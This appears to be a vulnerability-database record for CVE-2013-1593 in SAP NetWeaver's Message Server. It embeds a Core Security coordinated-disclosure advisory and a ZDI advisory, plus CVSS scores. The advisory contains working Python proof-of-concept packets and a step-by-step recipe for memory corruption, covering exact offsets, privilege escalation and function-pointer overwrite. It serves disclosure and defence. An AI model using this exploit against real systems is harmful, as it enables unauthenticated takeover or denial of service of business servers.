ID

VAR-202001-0833


CVE

CVE-2013-1593


TITLE

SAP Netweaver ABAP 'msg_server.exe' Parameter name remote code execution vulnerability

Trust: 0.8

sources: IVD: 29348194-1f62-11e6-abef-000c29c66e3d // CNVD: CNVD-2012-3434

DESCRIPTION

A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----

Trust: 5.49

sources: NVD: CVE-2013-1593 // JVNDB: JVNDB-2013-007128 // ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433 // BID: 57956 // IVD: 29348194-1f62-11e6-abef-000c29c66e3d // IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d // VULMON: CVE-2013-1593 // PACKETSTORM: 120350 // PACKETSTORM: 114279

IOT TAXONOMY

category:['ICS']sub_category: -

Trust: 1.6

sources: IVD: 29348194-1f62-11e6-abef-000c29c66e3d // IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433

AFFECTED PRODUCTS

vendor:sapmodel:netweaverscope: - version: -

Trust: 2.1

vendor:sapmodel:netweaverscope:eqversion:2004s

Trust: 1.8

vendor:sapmodel:netweaver abapscope: - version: -

Trust: 1.2

vendor:sapmodel:netweaverscope:eqversion:7.01

Trust: 1.0

vendor:sapmodel:netweaverscope:eqversion:7.02

Trust: 1.0

vendor:sapmodel:netweaverscope:eqversion:7.30

Trust: 1.0

vendor:sapmodel:netweaverscope:eqversion: -

Trust: 0.8

vendor:sapmodel:netweaverscope:eqversion:7.01 sr1

Trust: 0.8

vendor:sapmodel:netweaverscope:eqversion:7.02 sp06

Trust: 0.8

vendor:sapmodel:netweaverscope:eqversion:7.30 sp04

Trust: 0.8

vendor:sapmodel:netweaver abap nullscope:eqversion:*

Trust: 0.4

vendor:sapmodel:netweaver 2004sscope:eqversion:0

Trust: 0.3

sources: IVD: 29348194-1f62-11e6-abef-000c29c66e3d // IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d // ZDI: ZDI-12-112 // ZDI: ZDI-12-111 // ZDI: ZDI-12-104 // CNVD: CNVD-2012-3434 // CNVD: CNVD-2012-3433 // BID: 57956 // JVNDB: JVNDB-2013-007128 // NVD: CVE-2013-1593

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-1593
value: HIGH

Trust: 1.0

NVD: CVE-2013-1593
value: HIGH

Trust: 0.8

ZDI: ZDI-12-112
value: HIGH

Trust: 0.7

ZDI: ZDI-12-111
value: HIGH

Trust: 0.7

ZDI: ZDI-12-104
value: HIGH

Trust: 0.7

IVD: 29348194-1f62-11e6-abef-000c29c66e3d
value: HIGH

Trust: 0.2

IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d
value: HIGH

Trust: 0.2

VULMON: CVE-2013-1593
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2013-1593
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

ZDI: ZDI-12-112
severity: HIGH
baseScore: 9.0
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 8.5
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

ZDI: ZDI-12-111
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

ZDI: ZDI-12-104
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

IVD: 29348194-1f62-11e6-abef-000c29c66e3d
severity: NONE
baseScore: NONE
vectorString: NONE
accessVector: NONE
accessComplexity: NONE
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: UNKNOWN

Trust: 0.2

IVD: 29fdb3de-1f62-11e6-abef-000c29c66e3d
severity: NONE
baseScore: NONE
vectorString: NONE
accessVector: NONE
accessComplexity: NONE
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: UNKNOWN

Trust: 0.2

nvd@nist.gov: CVE-2013-1593
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: CVE-2013-1593
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

